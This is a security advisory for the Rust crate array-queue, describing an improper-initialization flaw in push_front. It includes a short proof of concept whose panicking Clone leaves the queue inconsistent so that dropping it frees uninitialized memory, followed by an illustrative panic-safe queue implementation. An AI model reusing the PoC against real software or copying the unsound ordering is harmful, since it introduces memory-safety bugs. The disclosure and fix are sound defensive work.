Improper Initialization Affecting array-queue package, versions >=0.3.0 <0.4.0


Severity: medium (CVSS assessment by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept

  • Snyk ID: SNYK-RUST-ARRAYQUEUE-12485340
  • Published: 4 Sept 2025
  • Disclosed: 2 Sept 2025
  • Credit: George Androutsopoulos

Introduced: 2 Sep 2025

CVE: not available. CWE-665

How to fix?

Upgrade array-queue to version 0.4.0 or higher.

Overview

array-queue is a Rust crate providing fixed-size bidirectional queues based on arrays.

Affected versions of this package are vulnerable to Improper Initialization via the array_queue::ArrayQueue::push_front function. push_front clones the argument it is given; an attacker who can make that clone panic leaves the queue's internal state inconsistent, so that when the structure is dropped it performs unsafe memory operations, including deallocation of memory that was never initialized.

PoC

#![forbid(unsafe_code)]

use array_queue::*;

// A type whose Clone implementation panics for one specific input
// (an 11-byte string); everything else clones normally.
struct StructA(String);

impl Clone for StructA {
    fn clone(&self) -> Self {
        if self.0.len() == 11 {
            panic!("PANIC HERE!")
        }
        StructA(self.0.clone())
    }
}

fn main() {
    let mut queue = ArrayQueue::<[StructA; 2]>::new();
    // First push: the 10-byte string clones without incident.
    let _ = queue.push_front(&StructA(String::from("0123456789")));
    // Second push: the 11-byte string makes clone panic inside push_front,
    // leaving the queue's internal state inconsistent when it is dropped.
    let _ = queue.push_front(&StructA(String::from("0123456789X")));
}
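The defensive counterpart to the PoC above, added here as an illustration and not the array-queue crate's own code or its actual fix: a minimal fixed-capacity queue whose push is panic-safe because the argument is cloned first, in safe code, and the slot is written and the length bumped only afterwards. `FixedQueue`, `QueueFull`, `Payload` and `demo` are hypothetical names; `Payload` mirrors the PoC's panicking `Clone`, and `demo` replays the PoC's two pushes and shows the queue still dropping cleanly.

```rust
// Added illustration, not array-queue's own code or its fix: a minimal
// fixed-capacity queue whose push is panic-safe. The invariant is
// "slots[..len] are initialized", and it is upheld by cloning the argument
// before any state is modified, then writing the slot, then bumping `len`.
use std::mem::MaybeUninit;
use std::panic::{catch_unwind, AssertUnwindSafe};

#[derive(Debug)]
pub struct QueueFull;

pub struct FixedQueue<T, const N: usize> {
    slots: [MaybeUninit<T>; N],
    len: usize,
}

impl<T: Clone, const N: usize> FixedQueue<T, N> {
    pub fn new() -> Self {
        FixedQueue {
            slots: std::array::from_fn(|_| MaybeUninit::uninit()),
            len: 0,
        }
    }

    pub fn len(&self) -> usize {
        self.len
    }

    /// Clone `value` into the next free slot.
    ///
    /// The unsound ordering this guards against is "bump `len`, then clone
    /// into the slot": if the clone panics, `len` already claims a slot that
    /// holds no value, and Drop would later run a destructor on garbage.
    pub fn push(&mut self, value: &T) -> Result<(), QueueFull> {
        if self.len == N {
            return Err(QueueFull);
        }
        // Step 1: clone in safe code, before touching any internal state.
        // A panic here unwinds with `slots` and `len` exactly as they were.
        let owned = value.clone();
        // Step 2: move the fully built value into the slot (cannot panic).
        self.slots[self.len].write(owned);
        // Step 3: only now does the slot count as initialized.
        self.len += 1;
        Ok(())
    }
}

impl<T, const N: usize> Drop for FixedQueue<T, N> {
    fn drop(&mut self) {
        for slot in &mut self.slots[..self.len] {
            // SAFETY: `len` is incremented only after a successful write,
            // so every slot below it holds an initialized T.
            unsafe { slot.assume_init_drop() };
        }
    }
}

/// Mirrors the advisory's PoC type: Clone panics for an 11-byte string.
#[derive(Debug)]
pub struct Payload(pub String);

impl Clone for Payload {
    fn clone(&self) -> Self {
        if self.0.len() == 11 {
            panic!("clone panicked on purpose");
        }
        Payload(self.0.clone())
    }
}

/// Replays the PoC sequence against the panic-safe queue and returns
/// (number of elements still held, whether the second push panicked).
pub fn demo() -> (usize, bool) {
    let mut queue: FixedQueue<Payload, 2> = FixedQueue::new();
    queue.push(&Payload(String::from("0123456789"))).unwrap();
    let second = catch_unwind(AssertUnwindSafe(|| {
        queue.push(&Payload(String::from("0123456789X")))
    }));
    let panicked = second.is_err();
    // The queue still holds exactly one element; dropping it at the end of
    // this function frees that one String and nothing else.
    (queue.len(), panicked)
}

fn main() {
    let (len, panicked) = demo();
    println!("elements after panicking clone: {len}, panicked: {panicked}");
}
```

Running the program prints one held element and a caught panic; under Miri or a sanitizer the drop is clean, because `len` never describes a slot that the clone did not finish filling. The same three-step ordering applies to push_front in a ring-buffer layout: compute the new head index, clone, write, and only then commit the index and length.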
